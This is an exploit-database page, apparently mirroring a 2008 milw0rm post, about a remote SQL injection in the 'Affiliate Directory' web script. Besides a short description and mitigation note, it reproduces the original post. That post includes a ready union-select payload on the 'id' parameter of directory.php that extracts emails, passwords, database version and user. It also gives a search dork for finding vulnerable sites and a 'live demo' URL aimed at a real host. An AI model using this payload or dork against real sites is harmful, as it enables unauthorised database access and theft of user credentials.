header-logo
Suggest Exploit
vendor:
Affiliate Directory
by:
Hussin X
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Affiliate Directory
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Affiliate Directory (id) Remote SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable script. The vulnerable parameter is ‘id’ which is not properly sanitized before being used in an SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. An attacker can exploit this vulnerability to gain access to the database and extract sensitive information.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query.
Source

Exploit-DB raw data:

|___________________________________________________|
|
| Affiliate Directory ( id) Remote SQL Injection Vulnerability
|
|___________________________________________________
|---------------------Hussin X----------------------|
|
|    Author: Hussin X
|
|    Home :  www.tryag.cc/cc
|
|    email:  darkangel_g85[at]Yahoo[DoT]com
|
|
|___________________________________________________
|                                                   |
|
|
| script : http://scripts-for-sites.com/item.php?item=107
|
| DorK   : "Copyright 2005 Affiliate Directory"
|___________________________________________________|

Exploit: 


www.[target].com/Script/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--





L!VE DEMO: :


http://affiliate.scripts-for-sites.com/directory.php?ax=deadlink&id=-14+union+select+1,2,concat_ws(0x3a,email,password,version(),user(),0x48757373696E5F58)+from+links--



____________________________( Greetz )____________________________
|
| tryag.cc | mriraq.com | DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR |
|  
| jiko | CraCkEr | Iraqihack | FAHD | mos_chori | str0ke | Silic0n
|_________________________________________________________________


                       Im IRAQi

# milw0rm.com [2008-08-19]